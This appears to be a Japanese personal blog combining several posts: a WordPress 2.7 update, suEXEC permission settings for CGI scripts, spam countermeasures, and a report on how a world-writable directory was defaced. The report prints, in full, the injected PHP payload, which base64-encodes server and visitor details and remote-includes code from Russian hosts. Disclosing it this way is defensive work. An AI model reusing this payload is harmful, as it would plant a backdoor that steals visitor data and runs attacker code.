また海外に出る事になるかもしれませんが、しばらくは日本でゆっくりしたいと思います。

記事を書くついでに、WordPress 2.7 に更新しました。
管理画面が一新されて使いやすくなっています。

それでは、本年もどうぞよろしくお願いいたします。

メール送信フォームを使用して連絡いただいたにもかかわらず、返事がない場合にはお手数ですが再度ご連絡ください。
ちなみに、botを欺くため spam 判定された場合は “Thank you for your comment!” と英語で表示されます。

SuEXEC については、suEXEC サポート – Apache HTTP サーバ に詳細情報が掲載されていますが、こちらの記事はサーバ管理者向けのものですので、一般ユーザが注意すべきことは、KENT WEB さん の FAQ suExec環境、CGIWrap環境って何ですか? のほうにわかりやすくまとめられています。

今後 CGI を設置する場合は、添付の説明書に書かれているパーミッション設定を以下のように読み替える必要があります。

CGI ファイル (*.cgi, *.pl など [注]): 755 or 705 → 701
ログファイル/データファイル: 666 or 606 → 600
読み込み専用ファイル: 644 or 604 → 600
ファイル生成ディレクトリ（ロック/ログ用など）: 777 or 707 → 701
CGI ファイルを設置したディレクトリ: 755 → 755 （変更無し）

注: KENT WEBさんで配布されている CGI は、ログやデータファイルに .cgi という拡張子をつけて、Web から参照できないようにするという方法が取られています。 この場合のパーミッション設定は、ログファイル/データファイルの項目にあわせる必要があります。

また、以前使用していた MovableType のアーカイブディレクトリをパーミッション 777 のまま放置していたため、中の PHP, html ファイルが改竄されていました。 こちらは既に使用していないので、ディレクトリごと削除いたしました。

【改竄内容】
攻撃者により改竄が行われた内容は、以下の 4通りです。 複数のディレクトリ／ファイルに渡って攻撃が行われました。

1. Others に対して書き込み権限を与えてあるディレクトリに、include_once() の http ハンドラを使用してロシアのサイトに接続するよう記述された php ファイルを作成する。（ファイル名はいくつかのパターンがありますが、system.php config.php など、他の PHP ファイルに紛れ込むようなファイル名が付けられています）

2. Others に対して書き込み権限を与えてあるディレクトリに、.htaccess を作成し、1 で設置されたファイルに誘導しようとする。

3. Others に対して書き込み権限を与えてある、既存の拡張子が .php のファイルに対して、1 と同様の内容を追記する。

4. Others に対して書き込み権限を与えてある、既存の拡張子が .html .htm のファイルに対して、外部参照 JavaScript でロシアのサイトに接続するよう追記する。

【コードサンプル】
1. 3. において、PHP ファイルに書き込まれたコードの例です。 ロシアのサイトに接続し、サーバ名、攻撃コードが仕掛けられた URL、アクセス時のパラメータ、参照元、アクセスした人の IP アドレスがロシアのサイトに送信されます。

error_reporting(0);
$s=”e”;$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"]
: $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"]
: $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"]
: $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c)
.”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”
.base64_encode($g).”.”.base64_encode($h).”.$s”;
if ((include(base64_decode(“aHR0cDovLw==”)
.base64_decode(“dXNlcjkubXNodG1sLnJ1″).”/?”.$str))){} else {
inc lude(base64_decode(“aHR0cDovLw==”)
.base64_decode(“dXNlcjcuaHRtbHRhZ3MucnU=”).”/?”.$str);}

エンコードされた文字列で検索すると、複数箇所で被害が出ていることを確認できました。

【調査状況】
プロバイダのスタッフに、アクセスログの検証作業を行っていただきましたが、rhein-strasse.de ドメインへのアクセス記録からは不審なアクセスは見つかりませんでした。 同じサーバを使用している（このサイトは、共有サーバのバーチャルドメイン運用です）他のユーザからも同様の報告があったとの事でしたので、現在サーバ全体のログファイルを調査中していただいております。

【対応状況：追記1】
18:00CEST 頃、サーバはメンテナンス中のため断続的に接続できない事があるとのアナウンスが出ていました。

【対応状況：追記2】
21:00CEST 現在、サーバの PHP が、モジュールモードから CGI モードに変更されています。 プロバイダからは、引き続き対応中とのコメントしか出ていませんが。

なお、今回は日本語リソースを導入せずに、英語版のまま使用しています。

大きな変更点

• これを書いている編集ウィンドウが、リッチテキストエディッタ（？）に変更された。 なお、設定により従来のスタイルも使用可能。
• 編集画面の下にあるプレビュー画面が、テンプレートを反映した物になった。

今後の課題

• Accept-Language ヘッダをチェックして、システムの言語設定を切り替えられるようにする。 （以前は、仮対応を行っていたが、判定方法に問題があったため現在は無効にしている。）
• テンプレート中の言語も上記設定により、切り替えられるようにする。（WordPress ME で対応しているので参考にさせていただく。）
• WordPress 管理外のデータを統合する。（ページ機能を使えば対応可能の見込み。）

コメント/トラックバックは、新機能のブラックワード/グレーワード判定機能（勝手に命名）でどれくらい弾けるかをテストするため、以前行っていた spam 対策は一旦外しています。 バージョンアップ時に面倒だったから、そのまま上書きしたという話も。(^^;;;

2 については、一時的な spam 対策です。 よりよい対策方法が見つかりましたら、これを解除する予定です。

また、コメント／トラックバック機能とは無関係ですが、html の gzip 圧縮機能を有効にしました。 対応ブラウザでは、ページ表示にかかる時間が若干短くなったと思います。 MovableType から移行する際に、有効化を忘れていました。(^^;

コメントを投稿する際には、『このコメントは広告目的ではありません。』ってところに、チェックを入れてやってください。

WordPress Japan Wiki:スパムコメント対策 の コメント投稿時にチェック必須にする : (効果体感度90%) を、一部アレンジして適用させていただきました。

＃WP は 複数カテゴリの設定が楽でいいなぁ。